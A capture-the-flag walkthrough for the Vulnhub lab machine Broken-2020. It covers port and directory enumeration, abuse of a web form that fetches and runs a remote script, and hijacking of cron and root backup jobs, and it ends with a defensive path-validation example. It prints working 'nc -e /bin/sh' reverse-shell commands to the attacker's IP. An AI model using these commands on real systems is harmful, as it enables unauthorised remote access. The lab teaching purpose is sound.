[VLN] Broken-2020

Today we are going to hack the Vulnhub machine called Broken-2020. You can download it from the following link: Broken-2020

Video


Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.32
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 15:53 CEST
Nmap scan report for 192.168.1.32
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
|   256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_  256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Coming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.39 seconds
Let's see whether there is anything interesting on the Apache side.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.32/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/07 16:02:48 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cms (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2020/05/07 16:02:58 Finished
===============================================================
We browse to http://192.168.1.32/cms/ and press the button. "Something" is triggered and the CMS gets "hacked"... Going back to http://192.168.1.32/cms/ we obtain flag1. Now we brute-force the cms directory to see what else is in there.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/cms -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.32/cms
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/07 16:02:19 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cc (Status: 301)
===============================================================
2020/05/07 16:02:27 Finished
===============================================================

Exploitation


That folder looks interesting, so we open http://192.168.1.32/cms/cc. The page asks for an IP and a port... We start an HTTP server on our side and submit our server's IP and port.

sml@Cassandra:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.32 - - [07/May/2020 16:00:21] "GET /d499dda8cfb8e278c0fa0bb9732a92d5.sh HTTP/1.0" 200 -
We can see the target connect to our server and request a .sh file. The target fetches whatever we serve under that name and runs it, so we create a file with exactly the requested name whose content is a reverse shell back to our machine.

sml@Cassandra:~$ echo "nc -e /bin/sh 192.168.1.148 5555" > d499dda8cfb8e278c0fa0bb9732a92d5.sh

Low shell


We start listening...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 52750
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now that we have a shell, let's explore the system a bit.

python -c 'import pty; pty.spawn("/bin/sh")'
$ cd /home
$ ls
alice
$ cd alice
$ ls
flag.txt  note.txt  script
$ cat flag.txt
{FLAG2:**Robing the rober**}
$ cat note.txt
Alice, 

Please do not install TrustMeCMS, I need check the source before

PS: I created a script to clear apache log during the tests

root
Let's look at the script folder and the script root created.

$ cd /home/alice/script
$ cat log.py
#!/usr/bin/python2.7
import requests
import os
import datetime

"""
#Juste in case I want stop this script remotly

r = requests.get("https://pastebin.com/raw/9vzu2CA5")

cmd=str(r.text)
check ="stopit"
if check == cmd :
        os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')

"""
path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
        clear = open(path+"/"+logfile, "w")
        clear.truncate(0)
        clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()
The remote kill switch in the docstring is commented out, so it never runs; what matters is that the script directory is writable by www-data. We rename the original and create a Python script with the same name that spawns another reverse shell back to our machine, to be picked up the next time the job runs.

$ mv log.py log.bck
$ echo "#!/usr/bin/python2.7" >> log.py
$ echo "import os" >> log.py
$ echo "os.system('nc -e /bin/sh 192.168.1.148 5556')" >> log.py
We listen for the new shell... and after a while...

sml@Cassandra:~$ nc -nlvp 5556
listening on [any] 5556 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 46634
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(alice) gid=1000(alice) groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
We explore again.

$ cd /home/alice
$ ls
backup  flag.txt  note.txt  script
$ cd backup
$ ls
flag.txt  logbot.log  note.txt  path.txt
$ cat flag.txt
{FLAG3:**Power of snak**}
$ cat note.txt
Alice we have been hacked !

Please put the path of the website backup directory in path.txt, my bot will do the rest

thx

root
The note says to write the directory to be backed up into path.txt, and path.txt is ours to edit. Root's bot copies whatever directory we name into our backup folder without checking it, so we put /root :) and shortly afterwards...

(root)flag.txt



$ echo "/root" > path.txt
$ ls
flag.txt  logbot.log  note.txt  path.txt  root
$ cd root
$ ls
flag.txt  log.txt  test.py
$ cat flag.txt
Congratulation for the root flag !

     _________
    / ======= \
   / __________\
  | ___________ |
  | | -root-  | |
  | |         | |
  | |_________| 
|_____________________________________________________________________
  \=____________/                     enjoyed this VM ?                         
      )
  / """"""""""" \                     I love bitcoin                            
     /
 / ::::::::::::: \           1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S                 
 =D-'
(_________________)
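The root step works because the bot trusts path.txt as-is. The bot's own code is not shown in the writeup (only test.py in the copied /root), so the following is an added example, not the machine's code, of the check a backup job running as root should make before copying: resolve the requested path and refuse anything that does not sit under the website root. The allowed root /var/www is an assumption; the writeup only says "the website backup directory".

```python
#!/usr/bin/env python3
"""Confine a privileged "back up whatever path.txt names" job to the website root.

Added example for the Broken-2020 path.txt step. /var/www is an assumed allowed root.
"""
import os


def safe_backup_path(requested, allowed_root="/var/www"):
    """Return the resolved path if it lies under allowed_root, otherwise None.

    realpath() collapses '..' and follows symlinks, so '/var/www/../../root' and a
    symlink planted inside the web root both end up compared as their real targets.
    commonpath() is used instead of startswith() so that '/var/wwwevil' is not
    mistaken for a child of '/var/www'.
    """
    requested = requested.strip()
    if not requested or not os.path.isabs(requested):
        return None
    root = os.path.realpath(allowed_root)
    target = os.path.realpath(requested)
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def read_path_file(text, allowed_root="/var/www"):
    """Parse the contents of path.txt: exactly one non-empty line, validated as above."""
    lines = [line for line in text.splitlines() if line.strip()]
    if len(lines) != 1:
        return None
    return safe_backup_path(lines[0], allowed_root)


if __name__ == "__main__":
    # Constructed inputs: the two things alice could have written into path.txt.
    for content in ("/var/www/html/cms\n", "/root\n"):
        print(repr(content), "->", read_path_file(content))
```

With this check in place, writing /root into path.txt gets the request dropped instead of delivering root's home directory to alice; the same pattern applies to any job that takes a path from a file or form a lower-privileged user can write.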